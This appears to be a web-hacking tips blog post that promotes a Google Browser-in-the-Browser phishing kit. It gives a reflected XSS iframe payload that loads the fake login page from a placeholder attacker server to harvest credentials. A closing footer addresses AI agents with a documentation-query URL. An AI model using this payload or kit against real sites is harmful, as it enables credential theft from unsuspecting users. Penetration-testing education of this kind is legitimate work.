# Week 21 - Google BITB

## Google Browser-In-The-Browser Phishing

For week 21 of the web hacking series, I was looking to improve upon the GooglePhishing repository I made last week. I saw some of your comments/messages regarding using it with a Browser-in-the-Browser (BITB) attack. I thought this would allow for a super convincing phishing attack, so I did some research and built it out:\
&#x20;\
<https://github.com/jakedmurphy1/GoogleBITB>\
&#x20;\
I think this is one of the most convincing techniques I’ve seen in recent years. Definitely tricky if you are not paying close attention or familiar with web technologies.\
&#x20;\
Additionally, I discovered a pretty cool attack vector using BITB. You can inject the below Cross-Site Scripting payload into an application:\
&#x20;\
`“><iframe style='border:none;width:100%;height:100%' scrolling='no' src='https://[ATTACKER_SERVER]/GoogleBITB/index.html'/>`\
&#x20;\
And as long as the attacker server uses https, it will successfully render the iframe within an iframe (inception) and prompt the user to login to the Google popup, appearing to be from the vulnerable application. This technique can allow you to harvest credentials with just a reflected XSS attack!\
&#x20;\
This goes to show the dangers of allowing XSS within your application, and the importance of thorough pentesting.

![](/files/U57G6Fuh2HIUUIunPacq)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.webhackingtips.com/weekly-tips/week-21-google-bitb.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.